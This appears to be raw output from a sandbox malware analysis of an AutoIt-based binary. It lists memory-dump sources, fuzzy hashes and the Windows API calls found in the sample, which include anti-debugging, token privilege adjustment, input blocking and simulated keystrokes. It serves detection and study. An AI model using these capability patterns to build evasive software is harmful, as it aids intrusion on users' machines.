                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1601658205-0
                                                                                                                                                                              • Opcode ID: 1254dbf214fc05b406902172efed97188880debbc0ffabaa7aee75e94d5d17d8
                                                                                                                                                                              • Instruction ID: 4e42f931d9cafb95a4c40fb6be088b8b7dcf59cc6fea44306fe90ddb69c8239b
                                                                                                                                                                              • Opcode Fuzzy Hash: 1254dbf214fc05b406902172efed97188880debbc0ffabaa7aee75e94d5d17d8
                                                                                                                                                                              • Instruction Fuzzy Hash: 0851B075A00210AFE710AF24D886F6A7BA5EB45718F48848CF906AF2D3C775AD418BB1
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 292994002-0
                                                                                                                                                                              • Opcode ID: e0858e197094ecb40adc651de3cf153011725720d5467d69661429bf83d5843a
                                                                                                                                                                              • Instruction ID: dbcc8702cdb63a703e1fdc81a6fe06a0fc649110eb439c942dc15427a8acd5a5
                                                                                                                                                                              • Opcode Fuzzy Hash: e0858e197094ecb40adc651de3cf153011725720d5467d69661429bf83d5843a
                                                                                                                                                                              • Instruction Fuzzy Hash: CE21D1317042109FD7119F26D848B5A7FE9FF85318F19946EE989AB252C771EC42CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00E1D8CE
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00E1D92F
                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000), ref: 00E1D943
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 234945975-0
                                                                                                                                                                              • Opcode ID: 1dc038a13d2b25bc12070e873460540c8c57fd7134d4db55bdc6d08fcde3a5e4
                                                                                                                                                                              • Instruction ID: 0c385f0190b560ed5e526de60aabdf97c5966a042cb559c0ca9eefe836fa54d1
                                                                                                                                                                              • Opcode Fuzzy Hash: 1dc038a13d2b25bc12070e873460540c8c57fd7134d4db55bdc6d08fcde3a5e4
                                                                                                                                                                              • Instruction Fuzzy Hash: 182190B1508705AFE7209F66DD48BEB77FCEB80318F10541EE546B2151D7B4EA84CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenW.KERNEL32(?,00DE46AC), ref: 00E0E482
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00E0E491
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00E0E4A2
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E0E4AE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2695905019-0
                                                                                                                                                                              • Opcode ID: 4760bbcbbfdee37b5825d0d663cf22f5ede28c57e3814f63445c42611ba53309
                                                                                                                                                                              • Instruction ID: 77e7096c72cd3d5b7b85bbc8f595a72c94ed520b58fa10a7a48d8ab3d0202702
                                                                                                                                                                              • Opcode Fuzzy Hash: 4760bbcbbfdee37b5825d0d663cf22f5ede28c57e3814f63445c42611ba53309
                                                                                                                                                                              • Instruction Fuzzy Hash: 85F0E5308189185BD210673CBC0D8AB7B6DAF02339B504B51F836E22F0D7789DD99695
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                                              • String ID: %.3d$X64
                                                                                                                                                                              • API String ID: 481472006-1077770165
                                                                                                                                                                              • Opcode ID: 96a4a29f2c62bf92a7eea200030cbb558269cbf5fa96328d1fab778749c83838
                                                                                                                                                                              • Instruction ID: 84738751a877a55e7cc14b88612c5e7259a015b411cec7303560b04703186efe
                                                                                                                                                                              • Opcode Fuzzy Hash: 96a4a29f2c62bf92a7eea200030cbb558269cbf5fa96328d1fab778749c83838
                                                                                                                                                                              • Instruction Fuzzy Hash: 80D012B1C0810CEACB8097909D48DF9737DAB28700F11CD62FA86E1060E624DA089731
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00DD2A8A
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00DD2A94
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00DD2AA1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                              • Opcode ID: 970d90d188f66a8c0b45701c226d5993cc9a3802bae6e923a86d40ffe8a71a1c
                                                                                                                                                                              • Instruction ID: 82d6699f6358383f2070ec20a55f495b86a67fde44dfa243139d50123afadd42
                                                                                                                                                                              • Opcode Fuzzy Hash: 970d90d188f66a8c0b45701c226d5993cc9a3802bae6e923a86d40ffe8a71a1c
                                                                                                                                                                              • Instruction Fuzzy Hash: C631D57494122D9BCB21DF68DD88B9DBBB8EF18310F5041DAE81CA7260EB309F858F55
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DC014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00DC09D8
                                                                                                                                                                                • Part of subcall function 00DC014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00DC09F5
                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E0205A
                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E02087
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00E02097
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 577356006-0
                                                                                                                                                                              • Opcode ID: 5dbb8a83eea27afcd2f567d254d6635d58cc7085295436f301a062d916549a50
                                                                                                                                                                              • Instruction ID: a907eb38f92965b0de5727ff17e20c171d5b5b3f41ce541b519324b896b32ea8
                                                                                                                                                                              • Opcode Fuzzy Hash: 5dbb8a83eea27afcd2f567d254d6635d58cc7085295436f301a062d916549a50
                                                                                                                                                                              • Instruction Fuzzy Hash: 0011BFB1814305AFE7189F54EC8AE6BBBF8EB04710B20841EF546A3291DB70BC81CA20
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00DC502E,?,00E698D8,0000000C,00DC5185,?,00000002,00000000), ref: 00DC5079
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00DC502E,?,00E698D8,0000000C,00DC5185,?,00000002,00000000), ref: 00DC5080
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00DC5092
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                              • Opcode ID: 263ba74c8f6c99d70c4581edc5c7451ef72e2e07dc4e095f525cf891b310f100
                                                                                                                                                                              • Instruction ID: b1f37310479a11c0b0da2b44823f052a1c7740a3fc0a6f9ae43ea80ba037f2a0
                                                                                                                                                                              • Opcode Fuzzy Hash: 263ba74c8f6c99d70c4581edc5c7451ef72e2e07dc4e095f525cf891b310f100
                                                                                                                                                                              • Instruction Fuzzy Hash: 02E04632000508AFCF216F61ED0CE483F6AEB50381F044018F809AB121DB35ED86DAE0
                                                                                                                                                                              APIs
                                                                                                                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E0ED04
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: mouse_event
                                                                                                                                                                              • String ID: DOWN
                                                                                                                                                                              • API String ID: 2434400541-711622031
                                                                                                                                                                              • Opcode ID: a7a0122105e15669b61fcb986d6b77318d1a82d4816b1ac88bba4d477af6c416
                                                                                                                                                                              • Instruction ID: da23383efb3fe33abf3b780059fa59a286399779c4971df342eb552f54ced3be
                                                                                                                                                                              • Opcode Fuzzy Hash: a7a0122105e15669b61fcb986d6b77318d1a82d4816b1ac88bba4d477af6c416
                                                                                                                                                                              • Instruction Fuzzy Hash: 8BE08C262ED76638F90421287C16FF6434CCF32B78B11265AF801F52C0ED925CC250B8
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00DFE664
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                              • String ID: X64
                                                                                                                                                                              • API String ID: 2645101109-893830106
                                                                                                                                                                              • Opcode ID: a35b8756ba05659b4afeadc62497d11e8dc9ca1c5baef98299161a30eb51af3d
                                                                                                                                                                              • Instruction ID: 6dad2d895d5fda2a49d703175438272888307e91b9a0b3570a48d43821428d0a
                                                                                                                                                                              • Opcode Fuzzy Hash: a35b8756ba05659b4afeadc62497d11e8dc9ca1c5baef98299161a30eb51af3d
                                                                                                                                                                              • Instruction Fuzzy Hash: 1FD0C9B480511DEACB80CB60EC88DD9777DBB04304F108A51F186E2040D730D6488F20
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E252EE,?,?,00000035,?), ref: 00E14229
                                                                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E252EE,?,?,00000035,?), ref: 00E14239
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                              • Opcode ID: 838b7106668a935660aa9d422f689729d9b86323367b1db0961ba039b9e492c4
                                                                                                                                                                              • Instruction ID: 146cc08bc58bd718de132ed980e2f858fc64a19a01bf7430147c5a4f48baff5e
                                                                                                                                                                              • Opcode Fuzzy Hash: 838b7106668a935660aa9d422f689729d9b86323367b1db0961ba039b9e492c4
                                                                                                                                                                              • Instruction Fuzzy Hash: CAF0E5706043286AEB2027A6AC4DFFB3A6DEFC9761F000175F505E22D1D9709D84C6B1
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E0BC24
                                                                                                                                                                              • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00E0BC37
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InputSendkeybd_event
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3536248340-0
                                                                                                                                                                              • Opcode ID: 2b55d5cead0f1b33cfebe9a94b549b41728bd4f043a33d5fb7d92800af4e8e1f
                                                                                                                                                                              • Instruction ID: 36510130a37f996e90e1fefe2ed1f149e86f76d82e0e59330aedda159aa80695
                                                                                                                                                                              • Opcode Fuzzy Hash: 2b55d5cead0f1b33cfebe9a94b549b41728bd4f043a33d5fb7d92800af4e8e1f
                                                                                                                                                                              • Instruction Fuzzy Hash: C7F06D7180424DAFEB019FA1D809BFEBFB4FF04309F00900AF951A5191C3798215DF94
                                                                                                                                                                              APIs
                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E01B48), ref: 00E01A20
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00E01B48), ref: 00E01A35
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 81990902-0
                                                                                                                                                                              • Opcode ID: 4573f105d3f07a01cf6f26f6706341db578256113daddb6ee2343f1e3a143e5d
                                                                                                                                                                              • Instruction ID: 532568c963e3239dc451c8292454b490cd361bfc74aedc9e1b134565aa4aaf0e
                                                                                                                                                                              • Opcode Fuzzy Hash: 4573f105d3f07a01cf6f26f6706341db578256113daddb6ee2343f1e3a143e5d
                                                                                                                                                                              • Instruction Fuzzy Hash: 7DE04F72018611EFE7252B11FC09F72BBA9EB04310F14891DF495D14B0DB626CA0DB20
                                                                                                                                                                              APIs
                                                                                                                                                                              • BlockInput.USER32(00000001), ref: 00E1F51A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BlockInput
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3456056419-0
                                                                                                                                                                              • Opcode ID: b145c3227434656a134e348d2981f66bec1f54f92f0ba9034381ae0a20a37405
                                                                                                                                                                              • Instruction ID: 5923ae0bd1cfc54b45d9415530b87ada49bb4ce6b7f23fc1cea90f1eaf07700d
                                                                                                                                                                              • Opcode Fuzzy Hash: b145c3227434656a134e348d2981f66bec1f54f92f0ba9034381ae0a20a37405
                                                                                                                                                                              • Instruction Fuzzy Hash: 26E012312142045FC7109F6AD805996B7E9EFA5761B048825F849D7251D670AD408BE0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00DC075E), ref: 00DC0D4A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                              • Opcode ID: 327c1463a4510413e5435b9edac72e7b7775372b72909198caf0f2f0e752252e
                                                                                                                                                                              • Instruction ID: 20afd0a717dda562cea6e4149c5644feddeda0cdc19bf494d1fe8883f5e34c6c
                                                                                                                                                                              • Opcode Fuzzy Hash: 327c1463a4510413e5435b9edac72e7b7775372b72909198caf0f2f0e752252e
                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00E2358D
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00E235A0
                                                                                                                                                                              • DestroyWindow.USER32 ref: 00E235AF
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00E235CA
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00E235D1
                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00E23700
                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00E2370E
                                                                                                                                                                              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E23755
                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00E23761
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E2379D
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E237BF
